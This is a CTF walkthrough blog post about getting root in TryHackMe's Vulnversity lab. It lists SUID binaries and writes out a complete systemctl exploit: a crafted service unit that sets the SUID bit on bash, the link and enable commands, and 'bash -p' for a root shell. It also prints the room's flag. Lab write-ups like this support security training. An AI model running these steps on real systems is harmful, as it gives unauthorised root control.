CTF – Vulnveristy Privilege Escalation

Task 5 of TryHackMe’s Vulnversity CTF room is Privilege Escalation. Previously we comprimsed the web server by uploading a reverse-shell payload in a PHTML file.

Now we’ve got a foot hold on the box, can we achieve root level access?

Task 5 – Privilege Escalation

Our task; now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

First of all we need to find the SUID files they’re referring to.

Use the following command to find all files with 4000 permissions; directing all the errors (they’re be a lot of permission denied messages) down into the null abyss.

find / -perm -4000 2>/dev/null

This will bring back a half decent list of binaries with the SetUID bit on them.

/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/bash
/bin/ping
/bin/fusermount
/sbin/mount.cifs

A careful analysis of this list reveals one file in particular that we can try and exploit; /bin/systemctl

Some info from freedesktop on the service

systemctl — Control the systemd system and service manager

systemctl may be used to introspect and control the state of the “systemd” system and service manager. Please refer to systemd(1) for an introduction into the basic concepts and functionality this tool manages.

systemctl.html

Researching a potential avenue led me to klockw3rks‘ article which shows this script as part of the payload:

After spending some time analysing and tweaking this, some additional info from John Hammond helped me come to this working payload:

$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > root.service

We then continue with generating a symlink:

$ /bin/systemctl link /tmp/root.service

Created symlink from /etc/systemd/system/root.service to /tmp/root.service.

We can then fire off the escalation:

$ /bin/systemctl enable --now /tmp/root.service

Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.

If we then check the permissions on bash:

$ ls -lah /bin/bash

-rwsr-sr-x 1 root root 1014K May 16 2017 /bin/bash

We can see the 4th character is an ‘s’…

Now if we run the following, we are escalated to the lofty heights of root:

bash -p

It may look like the command has hung and there is no prompt – the shell is just a bit mucked up. You can commit commands, e.g:

whoami
root

Finally the flag at /root/root.txt is accessible:

a58ff8579f0a9270368d33a9966c7fd5

With that CTF completed, TryHackMe’s Vulnersity room is completed

Leave a Reply

Your email address will not be published. Required fields are marked *